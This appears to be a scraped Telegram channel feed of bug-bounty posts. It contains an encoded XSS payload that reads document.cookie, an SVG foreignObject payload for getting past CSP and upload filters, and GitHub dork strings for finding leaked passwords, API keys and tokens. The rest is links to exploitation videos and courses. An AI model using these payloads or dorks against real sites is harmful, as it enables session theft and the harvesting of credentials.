SQLi and Xss on Same program
Pyload: <svg onload=prompt%26%230000000040document.cookie)>
Pyload: <svg onload=prompt%26%230000000040document.cookie)>
❤9🔥3👏2👍1
Media is too big
VIEW IN TELEGRAM
I wanted to create a free blogger website. You will get many things for free on this site. Now I tested what I saw. Everyone can visit: https://shadowcyber51.blogspot.com/2024/10/test.html?m=1
🔥9🥰3👍2
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
🔥12👏3👍1
Those who are interested in Android phone hacking can read this article
https://shorturl.at/x8jNs
https://shorturl.at/x8jNs
🔥7❤2👍1
Live Bug Bounty Advanced GitHub Recon | Secrets of Bug Hunters
https://youtu.be/46SZdvM-fxw?si=VVLWHqOlus8J7MKO
https://youtu.be/46SZdvM-fxw?si=VVLWHqOlus8J7MKO
YouTube
Live Bug Bounty Advanced GitHub Recon | Secrets of Bug Hunters
🔴 LIVE BUG BOUNTY: Advanced GitHub Recon | Secrets of Pro Bug Hunters
Welcome to an exclusive live bug bounty session where we dive deep into advanced GitHub recon! 🚀 Learn the top secrets of pro bug hunters as I walk you through my process to find vulnerabilities…
Welcome to an exclusive live bug bounty session where we dive deep into advanced GitHub recon! 🚀 Learn the top secrets of pro bug hunters as I walk you through my process to find vulnerabilities…
❤22💯2👍1
My team met developed a Recon Engine with subdomain find, port scan, parameter find, technology detect, information disclosure, git dorking, cve search etc many more features. You guys should check this Recon Engine. If you know anything valid and interesting that missing on the Recon engine you can suggest us by giving link. DM us.
https://freelancermijan.github.io/reconengine/
https://freelancermijan.github.io/reconengine/
👍30❤11🔥7💩5🤝4🥰3
Forwarded from Offensive Security
#Exclusive 🔥
HTB Academy – Bug Bounty Hunter Job Rule Path 2024.11
🔗 Download
Info : https://academy.hackthebox.com/path/preview/bug-bounty-hunter
@offensivesecurity
HTB Academy – Bug Bounty Hunter Job Rule Path 2024.11
🔗 Download
Info : https://academy.hackthebox.com/path/preview/bug-bounty-hunter
@offensivesecurity
❤11👍2
🔖 Here’s a list of 10 Github dorks to find secret and access tokens
"https://target.com" send_keys
"https://target.com" password
"https://target.com" api_key
"https://target.com" apikey
"https://target.com" jira_password
"https://target.com" root_password
"https://target.com" access_token
"https://target.com" config
"https://target.com" client_secret
"https://target.com" user auth
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
❤11🔥5👍2
How to Find and Exploit 𝐌𝐢𝐬𝐜𝐨𝐧𝐟𝐢𝐠𝐮𝐫𝐞𝐝 𝐩𝐡𝐩𝐌𝐲𝐀𝐝𝐦𝐢𝐧 | Bug Bounty POC
https://youtu.be/XtIMOsE0554?si=Hq708taLUcVb8nXB
https://youtu.be/XtIMOsE0554?si=Hq708taLUcVb8nXB
YouTube
How to Find and Exploit 𝐌𝐢𝐬𝐜𝐨𝐧𝐟𝐢𝐠𝐮𝐫𝐞𝐝 𝐩𝐡𝐩𝐌𝐲𝐀𝐝𝐦𝐢𝐧 | Bug Bounty POC
"Ready to take your bug bounty skills to the next level? In this video, I’ll show you how to find and exploit misconfigured phpMyAdmin setups in web applications. 🚀
👉 Get Hostinger Discount ➜ https://bit.ly/Hostinger-Coupon-C0de
💥 HOSTINGER COUPON CODE:…
👉 Get Hostinger Discount ➜ https://bit.ly/Hostinger-Coupon-C0de
💥 HOSTINGER COUPON CODE:…